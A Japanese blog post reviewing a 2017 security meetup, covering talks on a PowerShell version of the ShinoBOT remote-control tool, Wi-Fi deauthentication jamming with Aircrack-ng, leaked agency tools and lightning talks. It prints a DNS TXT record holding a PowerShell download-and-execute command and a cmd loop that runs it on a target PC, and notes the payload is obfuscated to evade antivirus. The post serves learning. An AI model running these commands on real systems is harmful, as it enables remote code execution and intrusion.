普段は仕事の都合により平日の勉強会は、ほぼ出れないんですが、運良く休みにできたので「濱⛵せっく」に参加させて頂きました!

• 濱⛵せっく とは

横濱界隈のセキュリティエンジニアが運営している情報やスキルを共有し合うことを目標とするセキュリティ勉強会です。
今回は3度目の出張版です。

ちなみに第2回の記事は→ 濱⛵せっく 出張版 #2 に参加させて頂きました

濱せっく 出張版 #3 (2017/08/02 19:00〜)¶

濱せっくとは 横濱界隈のセキュリティエンジニアが運営している情報やスキルを共有し合うことを目標とするセキュリティ勉強会です。 今回は3度目の出張版です。 読み方：はませっく #### 対象者 セキュリティに興味のある方であれば、学生でも社会人でも無職の方でもどなたでも大歓迎です。 なお、横濱にお住まいでなくても参加できます。 ## 開催日時 * 2017年8月2日(火) * 18:30開場 / 19:00開始 * 21:00～21:30 終了見込み * 22:00 完全撤収 (それまでは参加者同士や講師陣とお話ししてて大丈夫です) ## 会場 ...

• • • • 濱せっく 出張版 #3 (2017/08/02 19:00〜)
• PowerShell版ShinoBOT @Sh1n0g1
  • • • ShinoBOT.ps1
  • DNSのTXTレコードにPowerShellのコードを仕込む
  • PowerShellコードの難読化
• あの日学んだ攻撃の方法を僕たちはまだ知らない @01ra66it
• リークドコード的何か 0xH@jic
  • • THE ZERO/ONE
• LT
  • 「書籍を執筆した話」　@takahoyo
  • 「QEMUの脆弱性と宣伝」　@hama7230
  • 「8/24(木) Security-JAWS、9/1(金) NW X Security-JAWSやります」@Typhon666_death
  • 「8/26（土）MINI hardening に遊びにおいでよ!」　@delphinz
  • 本当は怖いXML @icchyr

以下、感想

PowerShell版ShinoBOT @Sh1n0g1¶

ShinoBOTの@Sh1n0g1さんですよ!!
奥さんとDEFCON行ってたそうです。いいな私も死ぬまでに行きたい。

さてさて、お話の内容はPowerShell版ShinoBOTです。これが素晴らしいクオリティで。
普通にターミナルとして使えるんじゃないかしらw

https://shinobotps1.com/

ShinoBOT.ps1¶

null

特筆すべきは、これですよ・・・

DNSのTXTレコードにPowerShellのコードを仕込む¶

エビスさんのコメント

手元のUbuntuで
dig TXT https://t.co/FOcJ1edSyb @8.8.8.8

で見ると、確かにコード入ってる
TXTレコードをこういう使い方するのかー
#hamasec

— Blacknon(エビス) (@blacknon_) 2017年8月2日

どういう事かと申しますと

$ dig  @8.8.8.8 shinobotps1.com txt

; <<>> DiG 9.9.4-RedHat-9.9.4-29.el7_2.4 <<>> @8.8.8.8 shinobotps1.com txt
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 52266
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;shinobotps1.com.               IN      TXT

;; ANSWER SECTION:
shinobotps1.com.        3599    IN      TXT     "powershell IEX (New-Object Net.WebClient).DownloadString('https://shinobotps1.com/download_get.php')\;"

;; Query time: 272 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: 木  8月 03 21:28:31 JST 2017
;; MSG SIZE  rcvd: 158

なんとDNSのTXTレコードに、PoweShellのコードをダウンロードして実行する手続きが設定されているんですよ…！
Windowsなら、以下で確認できます。

>nslookup -querytype=TXT shinobotps1.com
サーバー:  UnKnown
Address:  xxx.xx.xxx.x

権限のない回答:
shinobotps1.com text =

        "powershell IEX (New-Object Net.WebClient).DownloadString('https://shinobotps1.com/download_get.php');"

shinobotps1.com nameserver = ns1.domain.com
shinobotps1.com nameserver = ns2.domain.com
ns2.domain.com  internet address = 65.254.254.171
ns1.domain.com  internet address = 66.96.142.147

つまり、対象のPCに対して

for /F “usebackq tokens=*” %i in (`”nslookup -querytype=TXT shinobotps1.com”`) do cmd /c %i

を実行できればPowerShellのコードが動いちゃうんですね。
フルサービスリゾルバ(DNS権威サーバ)を自前で用意しないと実現できないですが、なんかDNSサーバ欲しくなりますねw

PowerShellコードの難読化¶

しかも、ダウンロードの度に動的にコードが変わる。ウィルス対策ソフトに検知されにくくする対策です。
高度…！

これ↓リロードする度に内容が変わる。

https://shinobotps1.com/download_get.php

あの日学んだ攻撃の方法を僕たちはまだ知らない @01ra66it¶

Twitterでよくお見かけしておりましたが、生@01ra66itさんを目撃

Aircrack-ngで、任意のAPを通信不能にする方法を照会して頂きました。
悪意のあるAPを黙らせるのに効果的ですね!

手続きの詳細は省略しますが、Aircrack-ngの一般的な使い方の応用なのでググればすぐ出てくるでしょう。

Aircrack-ngは、

1. パケット収集
2. パケット解析
3. 解析結果からパスワードを発見

てな感じで通常実行するんですが、APと通信している端末が無いと「1.パケット収集」時にパケットの収集が捗らない場合があります。
そんな時に、Aircrack-ngでは、バッサリ切断する(たぶん、データリンク層レベルで)パケットを出すことが出来て、その際の再接続のパケットを収集するという技があります。

これを短い間隔で連続で繰り出せば、通信できなくなっちゃいますねw
ジャミングとして使うという発想がなかっただけに、目からウロコでございました。

ちなみに、USBのWifiアンテナを使って、それをVMwareのKaliLinux上のAircrack-ngで動かす方法は以下になりますよ(昔調べてた)

Aircrack-ngを使うためにVMwareのKaliLinuxでUSBトングルのWifiを使う

リークドコード的何か 0xH@jic¶

これ、、めっちゃ濃い情報で面白かったです！
私は、以下を読んでたので、コレと@0xH@jicさんの話がリンクして大変興奮しました。

読んでみるのオススメ！世界レベルでのサイバー戦争の闇が、ちょっとだけ垣間見れます。

THE ZERO/ONE¶

暴露されたCIAの諜報能力「Vault 7」の衝撃度（前編）
https://the01.jp/p0004740/

暴露されたCIAの諜報能力「Vault 7」の衝撃度（中編）
https://the01.jp/p0004753/

暴露されたCIAの諜報能力「Vault 7」の衝撃度（後編）
https://the01.jp/p0004767/

Wanna Cryに攻撃手法を提供した「Shadow Brokers」とは何者か？
https://the01.jp/p0005012/

再び世界を襲ったNSAのエクスプロイト
https://the01.jp/p0005312/

身代金を「本気で要求していない」身代金ウイルス
https://the01.jp/p0005325/

もはやランサムウェアとは呼べない「NotPetya（Petya）」の恐怖 (3) 3000万円で復号キー売ります
https://the01.jp/p0005338/

LT¶

「書籍を執筆した話」　@takahoyo¶

生takahoyoさん、略して生ほよさんがいた。
セキュリティコンテストチャレンジブック -CTFで学ぼう! 情報を守るための戦い方-はもう買ってた。セキュリティコンテストのためのCTF問題集も買います～

これが噂のお買い得セットですか→【期間限定セット】セキュリティコンテストのためのCTF問題集［セキュリティコンテストチャレンジブック付き］｜Tech Book Zone Manatee #Manatee https://t.co/w7RBQWRaEn #hamasec

— もってぃ (@mot_skmt) 2017年8月2日

「QEMUの脆弱性と宣伝」　@hama7230¶

赤いサンタの帽子のTwitterの人を生で見た。略して生(以下略
Tokyo WesternsというCTFガチ勢を目の当たりにしてジョバった。

なんか今回はガチ勢が集結しているっぽい。

QEMUには浪漫があって、浪漫の先にゲストOSを突破してホストOSに到達できる。

あと、Tokyo Westerns CTF というのがあってですね。

宣伝
　CTF開催します 9/2～9/4
#HamaSec #Security #Forensic #OSINT pic.twitter.com/qesh5YxacP

— 笑われ男 (@Waraware_man) 2017年8月2日

やりたみがある。

「8/24(木) Security-JAWS、9/1(金) NW X Security-JAWSやります」@Typhon666_death¶

宣伝
　8/24(木)　Security-JAWS
　9/1(金)　NW X Security-JAWS　ほか
#HamaSec #Security #Forensic #OSINT pic.twitter.com/VEytx0aDv3

— 笑われ男 (@Waraware_man) 2017年8月2日

8月下旬は、何故かいろんなイベントが重なっていてツライ。どれか選ばなければ・・・

「8/26（土）MINI hardening に遊びにおいでよ!」　@delphinz¶

LT
　4.「8/26（土）MINI hardening に遊びにおいでよ!」 @delphinzさんhttps://t.co/i7FeZwnnld
#HamaSec #Security #Forensic #OSINT

— 笑われ男 (@Waraware_man) 2017年8月2日

hardeningは経験ないけど面白そう。

本当は怖いXML @icchyr¶

XMLは、なかなか闇が深そうな匂いを感じた。
今度詳しく知りたいと思いました～。